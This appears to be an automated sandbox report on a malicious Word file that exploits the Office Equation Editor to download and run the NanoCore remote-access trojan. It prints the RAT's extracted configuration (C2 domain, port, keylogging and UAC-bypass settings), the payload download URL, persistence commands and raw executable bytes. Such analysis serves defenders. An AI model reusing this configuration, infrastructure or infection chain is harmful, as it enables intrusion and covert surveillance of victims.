Loading ...

Play interactive tourEdit tour

Windows Analysis Report PO-14092021.doc

Overview

General Information

Sample Name:PO-14092021.doc
Analysis ID:483042
MD5:93abec14185d380695f65beaaca97b84
SHA1:c18eaeac2c4371dd8e79de62ce60a7b7767f995a
SHA256:e73b710e825a32ebe4122240ecac87eff1bc76fe130fc41fc5858dafaf96d3b7
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Yara detected AntiVM3
Detected Nanocore Rat
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Injects a PE file into a foreign processes
Office equation editor drops PE file
.NET source code contains very large strings
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Office Equation Editor has been started
Contains functionality to detect virtual machines (SLDT)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2008 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2576 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • plugmangd5693.exe (PID: 1580 cmdline: C:\Users\user\AppData\Roaming\plugmangd5693.exe MD5: 19665F929613C0E945FF13DD25C9362E)
      • schtasks.exe (PID: 2244 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\RWbqWnnjDWI' /XML 'C:\Users\user\AppData\Local\Temp\tmp3709.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • RegSvcs.exe (PID: 1292 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)
      • RegSvcs.exe (PID: 2996 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe MD5: 72A9F09010A89860456C6474E2E6D25C)
        • schtasks.exe (PID: 2560 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3FEE.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • schtasks.exe (PID: 1516 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2DF5.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
  • taskeng.exe (PID: 2212 cmdline: taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • RegSvcs.exe (PID: 2960 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0 MD5: 72A9F09010A89860456C6474E2E6D25C)
    • smtpsvc.exe (PID: 2128 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 MD5: 72A9F09010A89860456C6474E2E6D25C)
  • smtpsvc.exe (PID: 2664 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 72A9F09010A89860456C6474E2E6D25C)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "6f656d69-7475-8807-1300-000c0a4c", "Group": "Default", "Domain1": "blackbladeinc52.ddns.net", "Domain2": "Backup Connection Host", "Port": 1664, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0xf7ad:$x1: NanoCore.ClientPluginHost
  • 0xf7da:$x2: IClientNetworkHost
00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xf7ad:$x2: NanoCore.ClientPluginHost
  • 0x10888:$s4: PipeCreated
  • 0xf7c7:$s5: IClientLoggingHost
00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000008.00000002.671546681.00000000005A0000.00000004.00020000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe75:$x1: NanoCore.ClientPluginHost
      • 0xe8f:$x2: IClientNetworkHost
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.2.RegSvcs.exe.764629.3.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xb184:$x1: NanoCore.ClientPluginHost
      • 0xb1b1:$x2: IClientNetworkHost
      8.2.RegSvcs.exe.764629.3.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xb184:$x2: NanoCore.ClientPluginHost
      • 0xc25f:$s4: PipeCreated
      • 0xb19e:$s5: IClientLoggingHost
      8.2.RegSvcs.exe.764629.3.raw.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        8.2.RegSvcs.exe.384dabc.7.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0xd9ad:$x1: NanoCore.ClientPluginHost
        • 0xd9da:$x2: IClientNetworkHost
        8.2.RegSvcs.exe.384dabc.7.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
        • 0xd9ad:$x2: NanoCore.ClientPluginHost
        • 0xea88:$s4: PipeCreated
        • 0xd9c7:$s5: IClientLoggingHost
        Click to see the 33 entries

        Sigma Overview

        AV Detection:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2996, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        Exploits:

        barindex
        Sigma detected: EQNEDT32.EXE connecting to internetShow sources
        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2576, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
        Sigma detected: File Dropped By EQNEDT32EXEShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2576, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe

        E-Banking Fraud:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2996, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        System Summary:

        barindex
        Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
        Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\plugmangd5693.exe, CommandLine: C:\Users\user\AppData\Roaming\plugmangd5693.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\plugmangd5693.exe, NewProcessName: C:\Users\user\AppData\Roaming\plugmangd5693.exe, OriginalFileName: C:\Users\user\AppData\Roaming\plugmangd5693.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2576, ProcessCommandLine: C:\Users\user\AppData\Roaming\plugmangd5693.exe, ProcessId: 1580
        Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
        Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\plugmangd5693.exe, ParentImage: C:\Users\user\AppData\Roaming\plugmangd5693.exe, ParentProcessId: 1580, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 1292
        Sigma detected: Possible Applocker BypassShow sources
        Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\plugmangd5693.exe, ParentImage: C:\Users\user\AppData\Roaming\plugmangd5693.exe, ParentProcessId: 1580, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 1292

        Stealing of Sensitive Information:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2996, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        Remote Access Functionality:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2996, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "6f656d69-7475-8807-1300-000c0a4c", "Group": "Default", "Domain1": "blackbladeinc52.ddns.net", "Domain2": "Backup Connection Host", "Port": 1664, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
        Multi AV Scanner detection for submitted fileShow sources
        Source: PO-14092021.docVirustotal: Detection: 27%Perma Link
        Source: PO-14092021.docReversingLabs: Detection: 20%
        Antivirus detection for URL or domainShow sources
        Source: http://lg-tv.tk/plugmanzx.exeAvira URL Cloud: Label: malware
        Multi AV Scanner detection for domain / URLShow sources
        Source: lg-tv.tkVirustotal: Detection: 14%Perma Link
        Source: blackbladeinc52.ddns.netVirustotal: Detection: 10%Perma Link
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exeReversingLabs: Detection: 39%
        Source: C:\Users\user\AppData\Roaming\RWbqWnnjDWI.exeReversingLabs: Detection: 39%
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeReversingLabs: Detection: 39%
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 8.2.RegSvcs.exe.764629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.384dabc.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.760000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.384dabc.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.38520e5.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.760000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2996, type: MEMORYSTR
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Roaming\RWbqWnnjDWI.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exeJoe Sandbox ML: detected
        Source: 8.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
        Source: 8.2.RegSvcs.exe.760000.2.unpackAvira: Label: TR/NanoCore.fadte

        Exploits:

        barindex
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugmangd5693.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugmangd5693.exe
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb9FFP source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: C:\Windows\dll\System.pdbog source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
        Source: Binary string: System.pdb H source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: qC:\Windows\System.pdb4 source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: s.pdb source: RegSvcs.exe, 00000008.00000002.671847791.0000000000C7D000.00000004.00000001.sdmp
        Source: Binary string: RegSvcs.pdb source: smtpsvc.exe
        Source: Binary string: #=qo5Pv9nXCIU9X_B8SJDUR_qgp7npNK2pA1rGP0GNQ51o=symbols\dll\System.pdb source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: C:\Win.pdbassembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
        Source: Binary string: System.pdb8 source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
        Source: Binary string: ystem.pdbl2}/ source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
        Source: Binary string: indows\System.pdbpdbtem.pdbes source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\System.pdb source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
        Source: global trafficDNS query: name: lg-tv.tk
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: blackbladeinc52.ddns.net
        Source: Malware configuration extractorURLs: Backup Connection Host
        Uses dynamic DNS servicesShow sources
        Source: unknownDNS query: name: blackbladeinc52.ddns.net
        Source: Joe Sandbox ViewASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
        Source: Joe Sandbox ViewASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
        Source: Joe Sandbox ViewIP Address: 185.239.243.112 185.239.243.112
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 14 Sep 2021 11:16:21 GMTContent-Type: application/x-msdownloadContent-Length: 530432Last-Modified: Tue, 14 Sep 2021 00:28:19 GMTConnection: keep-aliveETag: "613feca3-81800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 25 ea 3f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 0e 08 00 00 08 00 00 00 00 00 00 62 2d 08 00 00 20 00 00 00 40 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 2d 08 00 4f 00 00 00 00 40 08 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 0d 08 00 00 20 00 00 00 0e 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 40 08 00 00 06 00 00 00 10 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 08 00 00 02 00 00 00 16 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 2d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 64 00 00 a8 e3 01 00 03 00 00 00 32 00 00 06 48 48 02 00 c8 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 50 00 00 00 01 00 00 11 02 28 14 00 00 0a 00 00 02 1f 0a 1f 0a 73 15 00 00 0a 7d 01 00 00 04 16 0a 2b 2b 00 16 0b 2b 18 00 02 7b 01 00 00 04 06 07 73 16 00 00 0a 28 17 00 00 0a 00 07 17 58 0b 07 1f 0a fe 04 0c 08 2d df 00 06 17 58 0a 06 1f 0a fe 04 0d 09 2d cc 2a 13 30 01 00 0c 00 00 00 02 00 00 11 00 02 7b 01 00 00 04 0a 2b 00 06 2a 26 00 02 03 7d 01 00 00 04 2a 00 00 1b 30 04 00 a0 00 00 00 03 00 00 11 00 03 1f 09 30 0f 03 16 32 0b 04 1f 09 30 06 04 16 fe 04 2b 01 17 0a 06 2c 13 00 1f 0f 1f 0f 72 01 00 00 70 1f 0f 28 2e 00 00 06 00 00 02 28 02 00 00 06 03 04 28 18 00 00 0a 6f 19 00 00 0a 16 fe 03 0b 07 2c 15 00 1f 0f 1f 0f 72 3f 00 00 70 1f 0f 28 2e 00 00 06 00 00 2b 44 00 00 05 6f 1a 00 00 0a 0c 2b 1e 12 02 28 1b 00 00 0a 0d 00 02 28 02 00 00 06 03 04 28 18 00 00 0a 09 6f 1c 00 00 0a 00 00 12 02 28 1d 00 00 0a 2d d9 de 0f 12 02 fe 16 03 00 00 1b 6f 1e 00 00 0a 00 dc 00 2a 01 10 00 00 02 00 64 00 2b 8f 00 0f 00 00 00 00 13 30 03 00 22 01
        Source: global trafficHTTP traffic detected: GET /plugmanzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: lg-tv.tkConnection: Keep-Alive
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 31.210.20.61:1664
        Source: plugmangd5693.exe, 00000004.00000002.427110466.0000000004D50000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: plugmangd5693.exe, 00000004.00000002.427110466.0000000004D50000.00000002.00020000.sdmp, RegSvcs.exe, 00000008.00000002.673567560.0000000005800000.00000002.00020000.sdmp, taskeng.exe, 0000000C.00000002.671441665.0000000001AF0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{33484DAD-E27E-45D9-8C45-49A85BDC4F7E}.tmpJump to behavior
        Source: unknownDNS traffic detected: queries for: lg-tv.tk
